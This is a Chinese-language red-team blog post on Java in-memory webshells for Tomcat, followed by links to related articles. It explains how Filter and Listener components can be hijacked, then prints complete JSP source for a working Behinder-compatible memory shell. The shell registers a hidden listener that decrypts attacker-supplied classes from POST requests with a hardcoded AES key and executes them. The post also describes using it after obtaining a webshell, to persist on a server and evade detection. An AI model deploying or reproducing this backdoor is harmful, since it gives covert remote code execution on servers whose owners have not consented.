红队视角下Java内存马的应用

原创 已于 2022-11-10 14:46:44 修改 · 1k 阅读 · 5 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#java #servlet #服务器
于 2022-11-07 14:48:11 首次发布
本文介绍了Java内存马在攻防演练中的重要作用,详细讲解了内存马的原理,特别是Filter型内存马的工作机制。通过在请求过程中动态修改或注册组件,实现持久化控制服务器。文中还分享了Filter内存马的实现步骤,并提供了实战连接及源代码参考,以冰蝎马为例展示了如何在不同Tomcat版本中应用。

0x00声明
出品|长白山攻防实验室(ID:hellp)
以下内容,来自长白山攻防实验室作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

0x01前言

经过最近几年的攻防演练,内存马技术在打点中发挥越来越重要的地位,内存马相比传统的webshell,更容易躲避传统安全监测设备的检测,通常被用来做持久化,规避检测,持续驻留目标服务器中,本次主要结合攻防演练的经验来系统阐述内存马技术。

0x02 内存马原理

在介绍原理之前,我想大家都有这样一个困惑,在拿到webshell后,总担心自己的webshell被管理员和其他攻击队发现,从而不能持久化控制目标主机。所以学好内存马原理至关重要,Java内存马类型如下:

图片

其原理为客户端发起一个web请求,中间件的各个独立的组件Listener、Filter、Servlet会在请求过程中做监听、判断、过滤操作,内存马利用请求过程在内存中修改已有的组件或者动态注册一个新的组件,插入恶意的shellcode达到持久化的控制服务器。

内存马优先级listener->filter->servlet,本文先讲fileter型内存马,想到fileter内存马首先要理解过滤链(FilterChain),在一个 Web 应用程序中可以注册多个 Filter 程序,也可以在web.xml注册多个组件,每个 Filter 程序都可以针对某一个 URL 进行拦截。如果多个 Filter 程序都对同一个 URL 进行拦截,那么这些 Filter 就会组成一个Filter 链(也称过滤器链)在开发中同时处理多个对象,要用doFilter进行处理。

0x03 内存马实现

我们已经了解了Filter内存马的原理,filter会创建FilterChain,这里注入Filter型内存马的3个对象的定义如下:

>filterDefs存放了filter的定义,比如名称跟对应的类
>filterConfigs除了存放了filterDef还保存了当时的Context
>FilterMaps则对应了web.xml中配置的

每个Filter执行完之后需要执行FilterChain#do-Filter放行,然后会继续进入到下一个filter,依次执行每个filter里面的doFilter()方法,而我们实现filter内存马也就是往FilterChain里加一个filter。

首先在filter里创建doFilter()方法,实现冰蝎马的请求,其中request方法是接受serlvet的请求,session获取session,利用pageContext.put方法进行保存信息。

图片

FilterMap对filter进行封装,定义其名称和URLPattern

图片

将filter添加到FilterConfig中进行调用。

图片

最后放到指定主机上运行即可

0x04 内存马实战

拿到webshell后,将写的内存马传到web目录下,进行连接如下:

图片

用冰蝎3.0进行连接,连接成功。注意Tomcat版本不同,内存马封包后的程序不同,需要进行不同版本的修改。

图片

0x05 本文源代码

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="javax.servlet.*" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="javax.crypto.Cipher" %>
<%@ page import="javax.crypto.spec.SecretKeySpec" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.connector.RequestFacade" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%
class GreetListener implements ServletRequestListener{
private final String pa = "3ad2fddfe8bad8e6";
@Override
public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
}
@Override
public void requestInitialized(ServletRequestEvent servletRequestEvent) {
try{
RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest();
Field field = requestfacade.getClass().getDeclaredField("request");
field.setAccessible(true);
Request request = (Request) field.get(requestfacade);
Response response = request.getResponse();
HttpSession session = request.getSession();
MappageContext = new HashMap();
pageContext.put("session", session);
pageContext.put("request", request);
pageContext.put("response", response);
ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();
if (request.getMethod().equals("POST")){
if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){
Class Lclass = cl.getClass().getSuperclass();
RushThere(Lclass,cl,session,request,pageContext);
}else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
Class Lclass = cl.getClass().getSuperclass().getSuperclass();
RushThere(Lclass,cl,session,request,pageContext);
}else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
RushThere(Lclass,cl,session,request,pageContext);
}else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
RushThere(Lclass,cl,session,request,pageContext);
}else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
RushThere(Lclass,cl,session,request,pageContext);
}else {
Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
RushThere(Lclass,cl,session,request,pageContext);
}
}
}catch(Exception ig){
ig.printStackTrace();
}
}
public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,MappageContext){
byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTNjU4RpCNyDXxJ8iAnpW6LUCBs73Ta2KEdFkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
try {
java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
define.setAccessible(true);
Class uclass = null;
try {
uclass = cl.loadClass("U");
} catch (ClassNotFoundException e) {
uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
}
Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
constructor.setAccessible(true);
Object u = constructor.newInstance(this.getClass().getClassLoader());
Method Um = uclass.getDeclaredMethod("g", byte[].class);
Um.setAccessible(true);
String k = pa;
session.setAttribute("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
Class eclass = (Class) Um.invoke(u, eClassBytes);
Object a = eclass.newInstance();
Method b = eclass.getDeclaredMethod("equals", Object.class);
b.setAccessible(true);
b.invoke(a, pageContext);
return;
}catch (Exception ig){
ig.printStackTrace();
}
}
}
%>
<%
ServletContext servletContext =  request.getSession().getServletContext();
Field appctx = servletContext.getClass().getDeclaredField("context");
appctx.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
Field stdctx = applicationContext.getClass().getDeclaredField("context");
stdctx.setAccessible(true);
StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
GreetListener servletRequestListener = new GreetListener();
standardContext.addApplicationEventListener(servletRequestListener);
out.println("长白山攻防实验室");
%>

0x06参考

  • https://www.cnblogs.com/zpchcbd/p/14814385.html

  • https://mp.weixin.qq.com/s/OWH42PojsFGO4fHSsUJhnw

中间件内存注入&冰蝎连接(附更改部分代码)1
08-03
2. 冰蝎源码简要分析 (JSP) 3. 修改 1. 分析环境准备 2. 冰蝎源码简要分析 (JSP)
内存基础知识 Java
CodeShiftZ的博客
09-07 576
Java中有三种类加载器:引导类加载器(Bootstrap Class Loader)、扩展类加载器(Extension Class Loader)和应用程序类加载器(Application Class Loader)。内存(Memory Shellcode)是一种恶意代码注入技术,它利用软件漏洞或者其他方式将恶意代码加载到受感染的进程内存中,并在执行过程中劫持程序的控制流。在Java中,我们可以自定义类加载器,通过继承ClassLoader类并实现自己的加载逻辑来加载类。内存基础知识 Java
一文深度学习java内存
jxiang213的博客
10-25 1470
java内存注入一般分为两种动态注册添加新的listener/filter/servlet/controller等等agent注入修改已有class,插入恶意代码在理解内存注入前,有几个概念需要掌握的。类加载双亲委派问题以及context类反射。
JAVA安全—手搓内存
2301_76227305的博客
03-01 1972
首先什么是内存呢,顾名思义就是把木打进内存中。传统的webshell一旦把文件删除就断开连接了,而Java内存则不同,它将恶意代码直接加载到内存中运行。因为代码是直接在内存中执行的,它不需要保存到硬盘上,这使得它很难被传统的杀毒软件发现和检测。至此结束。
学习Java agent 内存(看不懂别关闭,直接喷!!!)
一剑开天门!的博客
12-23 3875
java agent 是 Java 程序,可以通过在 Java 虚拟机(JVM)启动时提供参数来加载和运行。它可以通过 java.lang.instrument 包提供的 Java 标准接口进行代码插桩,从而在 Java 应用程序的类加载和运行期间改变 Java 字节码。而java agent内存就是利用这个特性产生。
浅析JavaWeb内存基础原理与查杀思路
道阻且长,行则将至
04-04 8494
传统的 Webshell 后门很容易被当前 WAF、HIDS、EDR 等安全设备检测出来,于是无文件落地的内存技术得以诞生并快速发展。本文简要分析了Java内存的原理、分类,并实践了主流Webshell客户端管理工具内存的使用与当前应对内存的一些查杀思路、手段。
Java应用纵深防御实战:从红蓝对抗到RASP防护体系构建》
ELIHU_han的博客
03-17 1037
在数字战场中,攻击者遵循"侦查→武器化→渗透→驻留→横向移动→目标达成"的杀伤链模型(Kill Chain),而防御者则需构建覆盖"预防→检测→响应→恢复"的纵深防线。: 外网Web漏洞 → 获取Jenkins凭据 → 横向渗透至K8s集群 → 窃取数据库密钥。:Java反序列化机制未校验输入对象的合法性,攻击者可通过构造恶意链触发RCE。2.1 反序列化漏洞:Fastjson/Gyro的POC构造与利用。2.3 内存驻留:基于Java Agent的无文件攻击技术。
内存技术:Filter,Servlet内存的注入与查杀
Alfadi联盟 萧瑶的博客
01-30 863
这名“黑化”的质检员看起来是合法员工(内存中的合法对象),不新增机器(不写文件),但他会偷偷拦截特定标识的原材料(特定参数的HTTP请求),执行非法加工(执行命令)并将结果混入正品中返回。它通过劫持或伪装成应用正常的运行时组件(如Filter、Servlet、Controller、Listener等),在内存中动态注册,从而能够拦截、处理特定的网络请求,实现命令执行、文件管理、隧道代理等恶意功能。· 文件型Webshell:相当于在工厂角落偷偷安装了一台独立的、非法的加工机器,容易被巡检(文件扫描)发现。
Confluence内存实战:无文件落地攻击的完整指南(含避坑技巧)
efc123456的博客
03-02 643
本文深入探讨了在Confluence环境中实施无文件落地攻击的核心技术——内存。针对Linux环境下Web目录写权限受限的痛点,详细解析了内存的原理、优势及完整注入流程,并提供了从手动实现到利用哥斯拉等成熟工具链的实战方法。文章还涵盖了高级隐蔽技巧、防御视角的检测手段,旨在为安全研究人员和防御工程师提供全面的攻防指南。
PotatoTool:从红队渗透到蓝队研判,一款集成免杀、内存与AI分析的网络安全多面手
最新发布
kubernetes8ctl的博客
03-07 459
PotatoTool是一款面向实战的Java跨平台网络安全综合平台,集成了红队渗透与蓝队研判的核心功能。红队方面,它提供从智能信息收集、免杀Payload生成、自定义内存制作到内网提权查询的一站式攻击链支持;蓝队方面,则具备一键解密加密Webshell流量、AI辅助分析恶意代码及反编译溯源等强大防御分析能力,有效打通攻防流程,提升安全人员工作效率。
Java内存简单实现
派大星的博客
12-04 2912
Java内存
Java内存 原理、实战与查杀】
weixin_46318447的博客
06-11 3849
内存原理 、实战与查杀
Java内存基础
m0_46317063的博客
02-05 539
filter内存基础
java内存
google20的博客
12-25 1713
filter,servlet,listener,valve,spring内存
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3794
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
java内存原理和检测方法
m0_67170526的博客
04-02 2075
内存为现在的主流webshell技术之一, 一般存在于JAVA环境, ASPX环境也有内存,但是PHP没有(有不死,类似条件竞争)内存主要用途是做权限维持,特点是无文件,代码保存在内存中,导致值守人员不太好进行排查。
[Java安全]—Controller内存
Sentiment的博客
11-02 739
Controller内存
【Web】小白友好的Java内存基础学习笔记
uuzeray的博客
02-10 2317
内存(Memory Shellcode)是一种恶意攻击技术,旨在通过利用程序或操作系统的漏洞,将恶意代码注入到系统内存中并执行。与传统的攻击方式不同,内存不需要将恶意代码写入磁盘上的文件,而是直接在内存中进行操作,从而避开传统的安全防护措施。内存的危害性在于它可以绕过许多传统的安全防护机制,例如防病毒软件和防火墙,因为恶意代码不会留下明显的痕迹或文件。此外,由于直接在内存中执行,内存攻击也更难以被检测和追踪。
干货|冰蝎、哥斯拉 内存应急排查
热门推荐
m0_60571990的博客
12-29 1万+
干货|冰蝎、哥斯拉 内存应急排查
32_behinder(冰蝎)
qq_45301512的博客
02-04 3618
有时候这个jd-gui工具无法打开文件,我们可以放一些其它的文件,例如我随便找的一个ArcTest.class文件,只要打开这个,agent.class也可以查看。防检测功能未生效,这里可能是软件功能没制作好,或者可能是只能防止部分软件检测,而恰好findshell不能防。或者停止服务器,再使用jps命令,对比发现少了哪个PID,快速判断目标JVM的PID。点击注入内存之后,注入类型选择agent,路径点击默认的,然后修改文件名。保存之后,点击上方的生成服务端,会自动弹出shell.jsp存放的文件夹。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值